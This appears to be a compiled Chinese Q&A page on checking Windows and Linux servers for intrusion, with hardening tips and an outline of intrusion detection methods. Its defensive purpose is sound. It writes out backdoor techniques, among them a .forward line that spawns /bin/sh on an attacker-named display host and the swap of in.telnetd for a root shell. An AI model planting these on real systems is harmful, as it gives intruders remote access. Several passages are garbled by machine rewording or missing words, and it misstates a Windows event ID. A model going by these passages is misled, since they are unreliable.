如何檢測伺服器是否入侵

『壹』 如何快速判斷伺服器是否被惡意入侵

而國內網路很大一部分的垃圾流量（惡意CC攻擊、ddos攻擊、垃圾郵件、垃圾彈窗廣告等）也都是以這類被盜用入侵的IDC產品為土壤而滋生的。
由此可見，對於自身的IDC產品做好安全防護及快速的故障排查是一個相當有必要的事情。不僅能提高自身產品的附加價值。提高產品的利用率。提升品牌形象，更能給客戶一個良好的服務面貌。
在此，筆者對常見的託管租用使用windows server
第一步、檢查系統組及用戶
我的電腦——右鍵管理——本地用戶和組——組
檢查administrators組內是否存在除開管理員用戶賬號（默認為administrator）以外的其他用戶賬號
檢查users組內是否存在非系統默認賬號或管理員指定賬號
本地用戶和組——用戶
檢查是否存在未做注釋或名稱異常的用戶
一般由於軟體後本被入侵的伺服器都會在administrators組內添加一個admin$或相類似的用戶，一旦發現該類用戶就應該首先避免運行任何程序，停止所有服務並及時使用殺毒軟體對伺服器關鍵區域（啟動駐存、C盤
系統文件夾 用戶自定義文件夾）進行完整掃描，避免木馬的二次交叉感染。
第二步，檢查管理員賬戶是否存在異常的登陸和注銷記錄
我的電腦——右鍵管理——事件查看器——安全性
篩選所有事件ID為576和528的事件（576為系統登陸日誌 528為系統注銷日誌）
查看具體事件信息內容。內容內會存在一個登陸IP。檢查該IP是否為管理員常用登陸的IP(ip138 你懂的)
第三步、檢查伺服器是否存在異常的登陸啟動項
開始菜單——所有程序——啟動
該目錄在默認情況下應該是一個空目錄，但是如果出現一個異常的.bat程序的話就應該全盤掃描伺服器以確認伺服器安全性
開始菜單——運行msconfig啟動菜單欄中是否存在命名異常的啟動項目，例如A.EXE
XXXXI1SU2.EXE等，一旦發現全盤掃描伺服器以確認伺服器安全性
開始菜單——運行regedit
hkey_current_user—software—micorsoft—windows—currentversion-run
hkey_current_machine—software—micorsoft—windows—currentversion-run
檢查以上2個項目下是否存在異常
一般情況下如果以上3個步驟檢查不存在異常的話基本就可以判定伺服器的安全環境是無故障的

『貳』 linux如何判斷自己的伺服器是否被入侵

1、檢查系統密碼文件

首先從明顯的入手，查看一下passwd文件，ls –l /etc/passwd查看文件修改的日期。

檢查一下passwd文件中有哪些特權用戶，系統中uid為0的用戶都會被顯示出來。

1

awk –F:』$3==0{print$1}』/etc/passwd

順便再檢查一下系統里有沒有空口令帳戶：

1

awk –F: 『length($2)==0{print$1}』/etc/shadow

2、查看一下進程，看看有沒有奇怪的進程

重點查看進程：ps –aef | grep inetd

inetd是UNIX系統的守護進程，正常的inetd的pid都比較靠前，如果你看到輸出了一個類似inetd –s /tmp/.xxx之類的進程，著重看inetd –s後面的內容。在正常情況下，LINUX系統中的inetd服務後面是沒有-s參數的，當然也沒有用inetd去啟動某個文件；而solaris系統中也僅僅是inetd –s，同樣沒有用inetd去啟動某個特定的文件；如果你使用ps命令看到inetd啟動了某個文件，而你自己又沒有用inetd啟動這個文件，那就說明已經有人入侵了你的系統，並且以root許可權起了一個簡單的後門。

輸入ps –aef 查看輸出信息，尤其注意有沒有以./xxx開頭的進程。一旦發現異樣的進程，經檢查為入侵者留下的後門程序，立即運行kill –9 pid 開殺死該進程，然後再運行ps –aef查看該進程是否被殺死；一旦此類進程出現殺死以後又重新啟動的現象，則證明系統被人放置了自動啟動程序的腳本。這個時候要進行仔細查找：find / -name 程序名 –print，假設系統真的被入侵者放置了後門，根據找到的程序所在的目錄，會找到很多有趣的東東J

UNIX下隱藏進程有的時候通過替換ps文件來做，檢測這種方法涉及到檢查文件完整性，稍後我們再討論這種方法。

接下來根據找到入侵者在伺服器上的文件目錄，一步一步進行追蹤。

3、檢查系統守護進程

檢查/etc/inetd.conf文件，輸入：cat /etc/inetd.conf | grep –v 「^#」，輸出的信息就是你這台機器所開啟的遠程服務。

一般入侵者可以通過直接替換in.xxx程序來創建一個後門，比如用/bin/sh 替換掉in.telnetd，然後重新啟動inetd服務，那麼telnet到伺服器上的所有用戶將不用輸入用戶名和密碼而直接獲得一個rootshell。

4、檢查網路連接和監聽埠

輸入netstat -an，列出本機所有的連接和監聽的埠，查看有沒有非法連接。

輸入netstat –rn，查看本機的路由、網關設置是否正確。

輸入 ifconfig –a，查看網卡設置。

5、檢查系統日誌

命令last | more查看在正常情況下登錄到本機的所有用戶的歷史記錄。但last命令依賴於syslog進程，這已經成為入侵者攻擊的重要目標。入侵者通常會停止系統的syslog，查看系統syslog進程的情況，判斷syslog上次啟動的時間是否正常，因為syslog是以root身份執行的，如果發現syslog被非法動過，那說明有重大的入侵事件。

在linux下輸入ls –al /var/log

在solaris下輸入 ls –al /var/adm

檢查wtmp utmp，包括messgae等文件的完整性和修改時間是否正常，這也是手工擦除入侵痕跡的一種方法。

6、檢查系統中的core文件

通過發送畸形請求來攻擊伺服器的某一服務來入侵系統是一種常規的入侵方法，典型的RPC攻擊就是通過這種方式。這種方式有一定的成功率，也就是說它並不能100%保證成功入侵系統，而且通常會在伺服器相應目錄下產生core文件，全局查找系統中的core文件，輸入find / -name core –exec ls –l {} ; 依據core所在的目錄、查詢core文件來判斷是否有入侵行為。

7、.rhosts和.forward

這是兩種比較著名的後門文件，如果想檢查你的系統是否被入侵者安裝了後門，不妨全局查找這兩個文件：

find / -name 「.rhosts」 –print

find / -name 「.forward」 –print

在某用戶的$HOME下，.rhosts文件中僅包含兩個+號是非常危險的，如果你的系統上開了513埠（rlogin埠，和telnet作用相同），那麼任意是誰都可以用這個用戶登錄到你的系統上而不需要任何驗證。

看到這里如果想要深入的做安全加固服務以及安全部署

就必須找專業做伺服器的安全公司來處理了國內也就Sine安全和綠盟比較專業提供。

Unix下在.forward文件里放入命令是重新獲得訪問的常用方法在某一 用戶$HOME下的.forward可能設置如下:

username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh"

這種方法的變形包括改變系統的mail的別名文件(通常位於/etc/aliases). 注意這只是一種簡單的變換. 更為高級的能夠從.forward中運行簡單腳本實現在標准輸入執行任意命令(小部分預處理後).利用smrsh可以有效的制止這種後門(雖然如果允許可以自運行的elm's filter或procmail類程序, 很有可能還有問題。在Solaris系統下，如果你運行如下命令：

ln -s /var/mail/luser ~/.forward

然後設置vacation有效，那麼/var/mail/luser就會被拷貝到~/.forward，同時會附加"|/usr/bin/vacation me"，舊的symlink被移到~/.forward..BACKUP中。

直接刪除掉這兩個文件也可以。

8、檢查系統文件完整性

檢查文件的完整性有多種方法，通常我們通過輸入ls –l 文件名來查詢和比較文件，這種方法雖然簡單，但還是有一定的實用性。但是如果ls文件都已經被替換了就比較麻煩。在LINUX下可以用rpm –V `rpm –qf 文件名` 來查詢，國家查詢的結果是否正常來判斷文件是否完整。在LINUX下使用rpm來檢查文件的完整性的方法也很多，這里不一一贅述，可以man rpm來獲得更多的格式。

UNIX系統中，/bin/login是被入侵者經常替換作為後門的文件，接下來談一下login後門 ：

UNIX里，Login程序通常用來對telnet來的用戶進行口令驗證。入侵者獲取login的源代碼並修改，使它在比較輸入口令與存儲口令時先檢查後門口令。如果用戶敲入後門口令，它將忽視管理員設置的口令讓你長驅直入：這將允許入侵者進入任何賬號，甚至是root目錄。由於後門口令是在用戶真實登錄並被日誌記錄到utmp和wtmP前產生的一個訪問，所以入侵者可以登錄獲取shell卻不會暴露該賬號。管理員注意到這種後門後，使用」strings」命令搜索login程序以尋找文本信息。許多情況下後門口令會原形畢露。入侵者又會開始加密或者更改隱藏口令，使strings命令失效。所以許多管理員利用MD5校驗和檢測這種後門。UNIX系統中有md5sum命令，輸入md5sum 文件名檢查該文件的md5簽名。它的使用格式如下：md5sum –b 使用二進制方式閱讀文件；md5sum –c 逆向檢查MD5簽名；md5sum –t 使用文本方式閱讀文件。

在前面提到過守護進程，對於守護進程配置文件inetd.conf中沒有被注釋掉的行要進行仔細比較，舉個簡單的例子，如果你開放了telnet服務，守護進程配置文件中就會有一句：telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd

可以看到它所使用的文件是 /usr/sbin/in.telnetd，檢查該文件的完整性，入侵者往往通過替換守護進程中允許的服務文件來為自己創建一個後門。

LINUX系統中的/etc/crontab也是經常被入侵者利用的一個文件，檢查該文件的完整性，可以直接cat /etc/crontab，仔細閱讀該文件有沒有被入侵者利用來做其他的事情。

不替換login等文件而直接使用進程來啟動後門的方法有一個缺陷，即系統一旦重新啟動，這個進程就被殺死了，所以得讓這個後門在系統啟動的時候也啟動起來。通常通過檢查/etc/rc.d下的文件來查看系統啟動的時候是不是帶有後門程序；這個方法怎麼有點象查windows下的trojan？

說到這里，另外提一下，如果在某一目錄下發現有屬性為這樣的文件：-rwsr-xr-x 1 root root xxx .sh，這個表明任何用戶進來以後運行這個文件都可以獲得一個rootshell，這就是setuid文件。運行 find –perm 4000 –print對此類文件進行全局查找，然後刪除這樣的文件。

9、檢查內核級後門

如果你的系統被人安裝了這種後門，通常都是比較討厭的，我常常就在想，遇到這種情況還是重新安裝系統算了J，言歸正傳，首先，檢查系統載入的模塊，在LINUX系統下使用lsmod命令，在solaris系統下使用modinfo命令來查看。這里需要說明的是，一般默認安裝的LINUX載入的模塊都比較少，通常就是網卡的驅動；而solaris下就很多，沒別的辦法，只有一條一條地去分析。對內核進行加固後，應禁止插入或刪除模塊，從而保護系統的安全，否則入侵者將有可能再次對系統調用進行替換。我們可以通過替換create_mole()和delete_mole()來達到上述目的。另外，對這個內核進行加固模塊時應盡早進行，以防系統調用已經被入侵者替換。如果系統被載入了後門模塊，但是在模塊列表/proc/mole里又看不到它們，有可能是使用了hack工具來移除載入的模塊，大名鼎鼎的knark工具包就有移除載入模塊的工具。出現這種情況，需要仔細查找/proc目錄，根據查找到的文件和經驗來判斷被隱藏和偽裝的進程。Knark後門模塊就在/proc/knark目錄，當然可能這個目錄是隱藏的。

『叄』 如何查看伺服器是否被攻擊

netstat
-anp
grep
'tcp\udp'
awk
'{print
$5}'
cut
-d:
-f1
sort
uniq
-c
sort
–n
該命令將顯示已登錄的是連接到伺服器的最大數量的IP的列表。
DDOS變得更為復雜，因為攻擊者在使用更少的連接，更多數量IP的攻擊伺服器的情況下，你得到的連接數量較少，即使你的伺服器被攻擊了。有一點很重要，你應該檢查當前你的伺服器活躍的連接信息，執行以下命令：
netstat
-n
grep
:80
wc
–l

『肆』 怎麼檢查網站伺服器是否被入侵

網站伺服器是否遭到侵略也可以終究靠以下幾個過程進行承認：
第一步：查看體系組及用戶。假設發現administrators組內增加一個admin$或相類似的用戶，或許性你的網站就已遭到了侵略；
第二步：查看管理員賬戶是否存在反常的登錄和刊出記載
挑選一切體系登錄日記及體系刊出日記，並具體查看其登錄ip，核實該ip是否為常用的管理員登錄ip；
第三步：查看伺服器是否存在反常啟動項
上面三個過程任何一個過程呈現了反常都有或許是因為伺服器遭到了侵略。
網站伺服器遭受侵略應該怎麼處理
1.暫時封閉網站
網站被侵略之後，最常見的狀況便是被植入木馬，為了確保訪問者的安全，一般都要把網站暫時封閉。在封閉過程中可以把域名暫時轉到別的一個網站或許一個告訴頁面。
2.剖析網站受損程度
有些黑客侵略了網站之後會把一切的網站數據都清空，假設有數據備份的站點可以終究靠數據備份康復網站數據，假設沒有備份的則需要請專業硬碟數據康復公司進行數據康復。假設網站的頁面數據沒有發生什麼改變，則網站或許僅僅是被掛馬了，可以終究靠第三四個過程消除影響。
3.檢測縫隙並打補丁
數據康復之後一定要掃描網站的縫隙並進行打補丁處理。一般的網站程序官方都會定時推出相關的補丁文件，只要把文件上傳到伺服器並掩蓋之即可。
4.木馬病毒鏟除
木馬病毒可以終究靠專業的殺毒軟體進行查殺。在這里必需要分外留意的是，有時候有些正常的文件都會被誤判為病毒，這樣一個時間段就需要用戶自己細心辨認之了。
5.常常備份數據
重要的數據經常備份
6.建議可以聯署一些防入侵，篡改的防護產品

『伍』 如何判斷一台Windows伺服器被黑客植入後門

封死黑客的「後門」

俗話說「無風不起浪」，既然黑客能進入，那說明系統一定存在為他們打開的「後門」，只要堵死這個後門，讓黑客無處下手，便無後顧之憂！

1.刪掉不必要的協議

對於伺服器和主機來說，一般只安裝TCP/協議就夠了。滑鼠右擊「網路鄰居」，選擇「屬性」，再滑鼠右擊「本地連接」，選擇「屬性」，卸載不必要的協議。其中是很多安全缺陷的根源，對於不需要提供文件和列印共享的主機，還可以將綁定在TCP/協議的關閉，避免針對的攻擊。選擇「TCP/協議/屬性/高級」，進入「高級TCP/IP設置」對話框，選擇「」標簽，勾選「禁用TCP/IP上的NETBIOS」一項，關閉NETBIOS。

2.關閉「文件和列印共享」

文件和列印共享應該是一個非常有用的功能，但在不需要它的時候，也是黑客入侵的很好的安全漏洞。所以在沒有必要「文件和列印共享」的情況下，我們可以將它關閉。用滑鼠右擊「網路鄰居」，選擇「屬性」，然後單擊「文件和列印共享」按鈕，將彈出的「文件和列印共享」對話框中的兩個復選框中的鉤去掉即可。

雖然「文件和列印共享」關閉了，但是還不能確保安全，還要修改注冊表，禁止它人更改「文件和列印共享」。打開注冊表編輯器，選擇「HKEY_CURRENT_」主鍵，在該主鍵下類型的鍵值，鍵值名為「NoFileSharingControl」，鍵值設為「1」表示禁止這項功能，從而達到禁止更改「文件和列印共享」的目的；鍵值為「0」表示允許這項功能。這樣在「網路鄰居」的「屬性」對話框中「文件和列印共享」就不復存在了。

3.把Guest賬號禁用

有很多入侵都是通過這個賬號進一步獲得管理員密碼或者許可權的。如果不想把自己的計算機給別人當玩具，那還是禁止的好。打開，雙擊「用戶和密碼」，單擊「高級」選項卡，再單擊「高級」按鈕，彈出本地用戶和組窗口。在Guest賬號上面點擊右鍵，選擇屬性，在「常規」頁中選中「賬戶已停用」。另外，將Administrator賬號改名可以防止黑客知道自己的管理員賬號，這會在很大程度上保證計算機安全。

4.禁止建立空連接

在默認的情況下，任何用戶都可以通過空連接連上伺服器，枚舉賬號並猜測密碼。因此，我們必須禁止建立空連接。方法有以下兩種：

方法一是修改注冊表：打開注冊表「HKEY_LOCAL_」，將值「RestrictAnonymous」的鍵值改為「1」即可。

最後建議大家給自己的系統打上補丁，微軟那些沒完沒了的補丁還是很有用的！

四、隱藏IP地址

黑客經常利用一些網路探測技術來查看我們的主機信息，主要目的就是得到網路中主機的IP地址。IP地址在網路安全上是一個很重要的概念，如果攻擊者知道了你的IP地址，等於為他的攻擊准備好了目標，他可以向這個IP發動各種進攻，如DoS(拒絕服務)攻擊、Floop溢出攻擊等。隱藏IP地址的主要方法是使用代理伺服器。

與直接連接到Internet相比，使用代理伺服器能保護上網用戶的IP地址，從而保障上網安全。代理伺服器的原理是在客戶機（用戶上網的計算機）和遠程伺服器（如用戶想訪問遠端伺服器）之間架設一個「中轉站」，當客戶機向遠程伺服器提出服務要求後，代理伺服器首先截取用戶的請求，然後代理伺服器將服務請求轉交遠程伺服器，從而實現客戶機和遠程伺服器之間的聯系。很顯然，使用代理伺服器後，其它用戶只能探測到代理伺服器的IP地址而不是用戶的IP地址，這就實現了隱藏用戶IP地址的目的，保障了用戶上網安全。提供免費代理伺服器的網站有很多，你也可以自己用等工具來查找。

五、關閉不必要的埠

黑客在入侵時常常會掃描你的計算機埠，如果安裝了埠監視程序（比如Netwatch），該監視程序則會有警告提示。如果遇到這種入侵，可用工具軟體關閉用不到的埠，比如，用「Norton Internet Security」關閉用來提供網頁服務的80和443埠，其他一些不常用的埠也可關閉。

六、更換管理員帳戶

Administrator帳戶擁有最高的系統許可權，一旦該帳戶被人利用，後果不堪設想。黑客入侵的常用手段之一就是試圖獲得Administrator帳戶的密碼，所以我們要重新配置Administrator帳號。

首先是為Administrator帳戶設置一個強大復雜的密碼，然後我們重命名Administrator帳戶，再創建一個沒有管理員許可權的Administrator帳戶欺騙入侵者。這樣一來，入侵者就很難搞清哪個帳戶真正擁有管理員許可權，也就在一定程度上減少了危險性。

七、杜絕Guest帳戶的入侵

Guest帳戶即所謂的來賓帳戶，它可以訪問計算機，但受到限制。不幸的是，Guest也為黑客入侵打開了方便之門！網上有很多文章中都介紹過如何利用Guest用戶得到管理員許可權的方法，所以要杜絕基於Guest帳戶的系統入侵。

禁用或徹底刪除Guest帳戶是最好的辦法，但在某些必須使用到Guest帳戶的情況下，就需要通過其它途徑來做好防禦工作了。首先要給Guest設一個強壯的密碼，然後詳細設置Guest帳戶對物理路徑的訪問許可權。舉例來說，如果你要防止Guest用戶可以訪問tool文件夾，可以右擊該文件夾，在彈出菜單中選擇「安全」標簽，從中可看到可以訪問此文件夾的所有用戶。刪除管理員之外的所有用戶即可。或者在許可權中為相應的用戶設定許可權，比方說只能「列出文件夾目錄」和「讀取」等，這樣就安全多了。

八、安裝必要的安全軟體

我們還應在電腦中安裝並使用必要的防黑軟體，殺毒軟體和防火牆都是必備的。在上網時打開它們，這樣即便有黑客進攻我們的安全也是有保證的。

九、防範木馬程序

木馬程序會竊取所植入電腦中的有用信息，因此我們也要防止被黑客植入木馬程序，常用的辦法有：

● 在下載文件時先放到自己新建的文件夾里，再用殺毒軟體來檢測，起到提前預防的作用。

● 在「開始」→「程序」→「啟動」或「開始」→「程序」→「Startup」選項里看是否有不明的運行項目，如果有，刪除即可。

● 將注冊表裡 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的所有以「Run」為前綴的可疑程序全部刪除即可。

十、不要回陌生人的郵件

有些黑客可能會冒充某些正規網站的名義，然後編個冠冕堂皇的理由寄一封信給你要求你輸入上網的用戶名稱與密碼，如果按下「確定」，你的帳號和密碼就進了黑客的郵箱。所以不要隨便回陌生人的郵件，即使他說得再動聽再誘人也不上當。

做好IE的安全設置

ActiveX控制項和 Applets有較強的功能，但也存在被人利用的隱患，網頁中的惡意代碼往往就是利用這些控制項編寫的小程序，只要打開網頁就會被運行。所以要避免惡意網頁的攻擊只有禁止這些惡意代碼的運行。IE對此提供了多種選擇，具體設置步驟是：「工具」→「Internet選項」→「安全」→「自定義級別」，建議您將ActiveX控制項與相關選項禁用。謹慎些總沒有錯！

另外，在IE的安全性設定中我們只能設定Internet、本地Intranet、受信任的站點、受限制的站點。不過，微軟在這里隱藏了「我的電腦」的安全性設定，通過修改注冊表把該選項打開，可以使我們在對待ActiveX控制項和 Applets時有更多的選擇，並對本地電腦安全產生更大的影響。

下面是具體的方法：打開「開始」菜單中的「運行」，在彈出的「運行」對話框中輸入Regedit.exe，打開注冊表編輯器，點擊前面的「+」號順次展開到：HKEY_CURRE-NT_USER\Software\Microsoft\Windows\CurrentVersion\InternetSettings\Zones\0，在右邊窗口中找到DWORD值「Flags」，默認鍵值為十六進制的21(十進制33)，雙擊「Flags」，在彈出的對話框中將它的鍵值改為「1」即可，關閉注冊表編輯器。無需重新啟動電腦，重新打開IE，再次點擊「工具→Internet選項→安全」標簽，你就會看到多了一個「我的電腦」圖標，在這里你可以設定它的安全等級。將它的安全等級設定高些，這樣的防範更嚴密。

『陸』 簡述入侵檢測常用的四種方法

入侵檢測系統所採用的技術可分為特徵檢測與異常檢測兩種。

1、特徵檢測

特徵檢測(Signature-based detection) 又稱Misuse detection ，這一檢測假設入侵者活動可以用一種模式來表示，系統的目標是檢測主體活動是否符合這些模式。

它可以將已有的入侵方法檢查出來，但對新的入侵方法無能為力。其難點在於如何設計模式既能夠表達「入侵」現象又不會將正常的活動包含進來。

2、異常檢測

異常檢測(Anomaly detection) 的假設是入侵者活動異常於正常主體的活動。根據這一理念建立主體正常活動的「活動簡檔」，將當前主體的活動狀況與「活動簡檔」相比較，當違反其統計規律時，認為該活動可能是「入侵」行為。

異常檢測的難題在於如何建立「活動簡檔」以及如何設計統計演算法，從而不把正常的操作作為「入侵」或忽略真正的「入侵」行為。

(6)如何檢測伺服器是否入侵擴展閱讀

入侵分類：

1、基於主機

一般主要使用操作系統的審計、跟蹤日誌作為數據源，某些也會主動與主機系統進行交互以獲得不存在於系統日誌中的信息以檢測入侵。

這種類型的檢測系統不需要額外的硬體．對網路流量不敏感，效率高，能准確定位入侵並及時進行反應，但是佔用主機資源，依賴於主機的可靠性，所能檢測的攻擊類型受限。不能檢測網路攻擊。

2、基於網路

通過被動地監聽網路上傳輸的原始流量，對獲取的網路數據進行處理，從中提取有用的信息，再通過與已知攻擊特徵相匹配或與正常網路行為原型相比較來識別攻擊事件。

此類檢測系統不依賴操作系統作為檢測資源，可應用於不同的操作系統平台；配置簡單，不需要任何特殊的審計和登錄機制；可檢測協議攻擊、特定環境的攻擊等多種攻擊。

但它只能監視經過本網段的活動，無法得到主機系統的實時狀態，精確度較差。大部分入侵檢測工具都是基於網路的入侵檢測系統。

3、分布式

這種入侵檢測系統一般為分布式結構，由多個部件組成，在關鍵主機上採用主機入侵檢測，在網路關鍵節點上採用網路入侵檢測，同時分析來自主機系統的審計日誌和來自網路的數據流，判斷被保護系統是否受到攻擊。

『柒』 幾條判斷Linux伺服器是否被入侵的技巧

檢查 1 - 當前都有誰在登錄?
你首先要查看當前都有誰登錄在伺服器上。發現攻擊者登錄到伺服器上進行操作並不復雜。
其對應的命令是 w。運行 w 會輸出如下結果：
08:32:55 up 98 days, 5:43, 2 users, load average: 0.05, 0.03, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 113.174.161.1 08:26 0.00s 0.03s 0.02s ssh root@
coopeaa12
root pts/1 78.31.109.1 08:26 0.00s 0.01s 0.00s w
第一個 IP 是英國 IP，而第二個 IP 是越南 IP。這個不是個好兆頭。
停下來做個深呼吸, 不要恐慌之下只是幹掉他們的 SSH 連接。除非你能夠防止他們再次進入伺服器，否則他們會很快進來並踢掉你，以防你再次回去。
請參閱本文最後的「被入侵之後怎麼辦」這一章節來看找到了被入侵的證據後應該怎麼辦。
whois 命令可以接一個 IP 地址然後告訴你該 IP 所注冊的組織的所有信息，當然就包括所在國家的信息。
檢查 2 - 誰曾經登錄過?
Linux 伺服器會記錄下哪些用戶，從哪個 IP，在什麼時候登錄的以及登錄了多長時間這些信息。使用 last 命令可以查看這些信息。
輸出類似這樣：
root pts/1 78.31.109.1 Thu Nov 30 08:26 still logged in
root pts/0 113.174.161.1 Thu Nov 30 08:26 still logged in
root pts/1 78.31.109.1 Thu Nov 30 08:24 - 08:26 (00:01)
root pts/0 113.174.161.1 Wed Nov 29 12:34 - 12:52 (00:18)
root pts/0 14.176.196.1 Mon Nov 27 13:32 - 13:53 (00:21)
這里可以看到英國 IP 和越南 IP 交替出現，而且最上面兩個 IP 現在還處於登錄狀態。如果你看到任何未經授權的 IP.

『捌』 如何看Linux伺服器是否被攻擊

以下幾種方法檢測linux伺服器是否被攻擊：
1、檢查系統密碼文件
首先從明顯的入手，查看一下passwd文件，ls –l /etc/passwd查看文件修改的日期。
2、查看一下進程，看看有沒有奇怪的進程

重點查看進程：ps –aef | grep inetd inetd是UNIX系統的守護進程，正常的inetd的pid都比較靠前，如果看到輸出了一個類似inetd –s
/tmp/.xxx之類的進程，著重看inetd
–s後面的內容。在正常情況下，LINUX系統中的inetd服務後面是沒有-s參數的，當然也沒有用inetd去啟動某個文件；而solaris系統中
也僅僅是inetd
–s，同樣沒有用inetd去啟動某個特定的文件；如果使用ps命令看到inetd啟動了某個文件，而自己又沒有用inetd啟動這個文件，那就說明已經有人入侵了系統，並且以root許可權起了一個簡單的後門。
3、檢查系統守護進程
檢查/etc/inetd.conf文件，輸入：cat /etc/inetd.conf | grep –v 「^#」，輸出的信息就是這台機器所開啟的遠程服務。
一般入侵者可以通過直接替換in.xxx程序來創建一個後門，比如用/bin/sh 替換掉in.telnetd，然後重新啟動inetd服務，那麼telnet到伺服器上的所有用戶將不用輸入用戶名和密碼而直接獲得一個rootshell。
4、檢查網路連接和監聽埠
輸入netstat -an，列出本機所有的連接和監聽的埠，查看有沒有非法連接。
輸入netstat –rn，查看本機的路由、網關設置是否正確。
輸入 ifconfig –a，查看網卡設置。
5、檢查系統日誌
命令last |
more查看在正常情況下登錄到本機的所有用戶的歷史記錄。但last命令依賴於syslog進程，這已經成為入侵者攻擊的重要目標。入侵者通常會停止系
統的syslog，查看系統syslog進程的情況，判斷syslog上次啟動的時間是否正常，因為syslog是以root身份執行的，如果發現
syslog被非法動過，那說明有重大的入侵事件。
在linux下輸入ls –al /var/log
檢查wtmp utmp，包括messgae等文件的完整性和修改時間是否正常，這也是手工擦除入侵痕跡的一種方法。
6、檢查系統中的core文件
通過發送畸形請求來攻擊伺服器的某一服務來入侵系統是一種常規的入侵方法，典型的RPC攻擊就是通過這種方式。這種方式有一定的成功率，也就是說並不能
100%保證成功入侵系統，而且通常會在伺服器相應目錄下產生core文件，全局查找系統中的core文件，輸入find / -name core
–exec ls –l {} \; 依據core所在的目錄、查詢core文件來判斷是否有入侵行為。
7、檢查系統文件完整性
檢查文件的完整性有多種方法，通常通過輸入ls –l
文件名來查詢和比較文件，這種方法雖然簡單，但還是有一定的實用性。但是如果ls文件都已經被替換了就比較麻煩。在LINUX下可以用rpm –V
`rpm –qf 文件名`
來查詢，查詢的結果是否正常來判斷文件是否完整。在LINUX下使用rpm來檢查文件的完整性的方法也很多，這里不一一贅述，可以man
rpm來獲得更多的格式。

『玖』 如何判斷linux伺服器被入侵

一般伺服器被入侵了，最顯著的信息就是通過網路命令查看是否有未知IP連接伺服器。

相關命令如下：

netstat-anltp

以上，根據查看的連接地址判斷是否有被入侵，如果不了解IP信息，可以把IP信息復制後放到網路上查詢下，看看IP所在地址是否在已知連接區域內。